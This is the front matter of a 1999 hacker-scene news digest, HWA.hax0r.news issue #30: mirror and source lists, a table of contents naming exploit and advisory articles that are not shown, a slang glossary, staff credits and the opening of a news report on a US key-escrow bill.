Copy Link
Add to Bookmark
Report

hwa-hn30

eZine's profile picture
Published in 
HWA
 · 5 years ago

  

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 30 Volume 1 1999 Aug 21st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================



New mirror sites

http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/

* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...



HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa


HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm



SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>



@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #30

=-----------------------------------------------------------------------=



We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=-------------------------------------------------------------------------=

Issue #30

=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Key Escrow bill up for vote again................................
04.0 .. The lost art of IRC warfare using eggdrop bots...................
05.0 .. Finally a working redhat 5.2 local exploit - From BlackBox issue #1
06.0 .. The State of Crypto today........................................
07.0 .. Using a backdoor in a firewalled system..........................
08.0 .. PacketStorm Security Sells Out?..................................
09.0 .. CryptoGram Aug 15th '99..........................................
10.0 .. TELNET.EXE HEAP OVERFLOW.........................................
11.0 .. SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE....................
12.0 .. THE MUSIC INDUSTRIES' "CYBER-SHERRIF"............................
13.0 .. ReDaTtAcK CHARGED ANYWAYS........................................
14.0 .. NA/MCAFEE RELEASES NEW VIRUS SERVICE.............................
15.0 .. TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET...........
16.0 .. E-COMMERCE AND PRIVACY...........................................
17.0 .. IDENTITY-THEFT...................................................
18.0 .. Y2K-THE MOVIE....................................................
19.0 .. 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES.........................
20.0 .. Y2K PROBLEMS.....................................................
21.0 .. GISB WILL USE PGP................................................
22.0 .. SURF ANONYMOUS FOR $5............................................
23.0 .. HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER............
24.0 .. PROJECTGAMMA BACK ONLINE.........................................
25.0 .. DETECTING INTRUDERS IN LINUX.....................................
26.0 .. WIRELESS CRIME-FIGHTING..........................................
27.0 .. 15-YEAR-OLD ADMITS HACKING INTO TCS..............................
28.0 .. JAPAN CLEARS WIRETAP BILL........................................
29.0 .. Warez Groups Hit With Racketeering Charges ......................
30.0 .. Public UK Sites Susceptible to Attack ...........................
31.0 .. Mitnick Prosecutor Moving to Private Practice ...................
32.0 .. NIPC Head Talks About FidNet ....................................
33.0 .. Spoofing revisited (w00w00)......................................
34.0 .. 2 Swedish men charged with hacking U.S computers.................
35.0 .. Feds delay network...............................................
36.0 .. The Effects of War on the Yugoslavian Network ...................
37.0 .. Survey Finds Internet Full of Holes .............................
38.0 .. Hacking Into an IT Career........................................
39.0 .. SETI@Home, Largest Computation Ever .............................
40.0 .. Hong Kong Blondes Labeled a Fraud ...............................
41.0 .. Peace Prize Winner Warns of Cyber War ...........................
42.0 .. Mitnick Still Denied Kosher Food ................................
43.0 .. Cable Pirates Busted ............................................
44.0 .. CSIS Admits Web Defacement ......................................
45.0 .. Win32.Kriz Set To Go Off Christmas Day ..........................
46.0 .. MS Windows Media Audio Broke One Day After Release ..............
47.0 .. Available Soon, Freedom! ........................................
48.0 .. AOL hacking IM users?............................................
49.0 .. Anti-gay site is hacked..........................................
50.0 .. Indonesian CyberWar? Or Not? ....................................
51.0 .. Gov Wants to Break Into to Personal Computers, Legally ,,,,,,,,,,
52.0 .. Hearings to be Held on Echelon ..................................
53.0 .. AOL Password Scam Uncovered .....................................
54.0 .. Bronc's Defcon VII Review .......................................
55.0 .. Y2K Survival Catalog ............................................
56.0 .. BELGIAN BANK COMPROMISED.........................................
57.0 .. CARDING IN NEWCASTLE.............................................
58.0 .. U.S.-British Cyber-Spy System Puts European Countries on Edge....
59.0 .. Watching the digital detectives..................................
60.0 ,, Microsoft acknowledges software glitch that exposes e-mail passwords
61,0 .. U.S to seek new computer surveillance power......................
62.0 .. Code cracker worries cryptographers..............................
63.0 .. AntiOnline offers infosec website hosting........................
64.0 .. PKI yesterday, today and tomorrow................................
65.0 .. Microsoft Advisory, double byte code page vulnerability..........
66.0 .. RHSA denial of service attack in in.telnetd......................
67.0 .. [EuroHaCk] stealth-code..........................................
68.0 .. RHSA; buffer overflow in libtermcap tgetent()....................
69.0 .. Possible AOL IM buffer overflow..................................
70.0 .. L0pht security advisory:Attackers can remotely add default route entries
71.0 .. Setuid bug in Oracle ............................................
72.0 .. Vulnerability In LSA on Windows NT SP5...........................
73.0 .. w00w00's efnet ircd advisory (exploit included)..................
74.0 .. hiperbomb.c - reboot a hiperarc router...........................
75.0 .. HP Security Bulletins Digest.....................................
76.0 .. cfingerd exploit..................................................
77.0 .. Microsoft Advisory:Patch Available for "Terminal Server Connection Request Flooding"
=--------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA.. .................
Ha.Ha .. Humour and puzzles ............................................

Hey You!........................................................
=------=........................................................

Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]



00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy"
will do ... ;-) thanx.



Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.


Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*


If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA



00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org



+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...


http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack

http://www.ottawacitizen.com/business/

http://search.yahoo.com.sg/search/news_sg?p=hack

http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack

http://www.zdnet.com/zdtv/cybercrime/

http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.



http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm

http://freespeech.org/eua/ Electronic Underground Affiliation

http://ech0.cjb.net ech0 Security

http://axon.jccc.net/hir/ Hackers Information Report

http://net-security.org Net Security

http://www.403-security.org Daily news and security related site


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

<a href="
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "
noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "
CC" the bugtraq
reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)



Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
visit http://www.counterpane.com/unsubform.html.  Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
Counterpane Systems, the author of "
Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.  He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
     
                      ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


Subscribe: mail majordomo@repsec.com with "
subscribe isn".



@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black


Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media



Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland


Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA



00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "
new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "
is not equal to" or "does not equal"
ASC(247) "
wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "
script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "
Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "
Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "
you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "
telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "
w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-




01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix


Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

& Kevin Mitnick (Happy Birthday)

kewl sites:

+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"
What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99



+++ When was the last time you backed up your important data?



Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(No mail worthy of posting here this issue,)


02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("
Read commented source!\n\n");

/*
* Issue #30... no comments this issue ...
*
*
*
*
*
* send submissions to: hwa@press.usmc.net
*/
printf ("
EoF.\n");
}



Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 Key-Escrow on the Move - Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hackernews.com/

contributed by evilwench
They aren't giving up. The Cyberspace Electronic
Security Act is currently being drafted by the Clinton
administration. In this latest bill, the administration
proposes that law enforcement agents have access to
decryption keys held by recovery agents. The proposed
law also allows the government to obtain search
warrants to find decryption keys if they are not held by
recovery agents. (Maybe the feeling is that if they keep
submitting new bills, one of them, eventually, will get
through. Unfortunately they are probably correct.)

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0816/fcw-newsencrypt-08-16-99.html


AUGUST 16, 1999


Bill reopens encryption access debate

BY DOUG BROWN (dbrown@fcw.com)
AND L. SCOTT TILLETT (scott_tillett@fcw.com)

Renewing efforts to allow law enforcement agencies to access and read
suspected criminals' encrypted electronic files, the Clinton administration has
drafted a bill that would give those agencies access to the electronic "
keys"
held by third parties.

The Cyberspace Electronic Security Act, the drafting of which is being led by
the Office and Management and Budget and the Justice Department, "
updates
law enforcement and privacy rules for our emerging world of widespread
cryptography," according to an analysis accompanying the bill obtained by
Federal Computer Week.

Encryption technology, according to the draft, is "
an important tool for
protecting the privacy of legitimate communications and stored data" but also
has been used "
to facilitate and hide unlawful activity by terrorists, drug
traffickers, child pornographers and other criminals." The new bill seeks to
uncover that activity by allowing law enforcement officials to obtain the keys
needed to decrypt messages by applying for search warrants or court orders,
much as they might do to uncover other evidence.

The administration is concerned about the use of encryption technology
because advances in recent years have made it extremely difficult for law
enforcement officials to crack a code once they have intercepted a message.

The draft bill is the Clinton administration's latest effort to push for legislation
that would make it easier for law enforcement agencies to intercept messages
or data that they think would be helpful in criminal investigations.

In 1993 the administration introduced the Clipper Chip, a hardware-based
encryption device designed to protect private communications but that would
provide a "
backdoor" for law enforcement officials to decrypt necessary data.
The Clipper effort died after privacy groups and industry warned that law
enforcement agencies could abuse the power.

"
All this is the Clipper Chip revisited in a different flavor but not as effective,"
said Michael Anderson, president of computer forensics firm New
Technologies Inc.

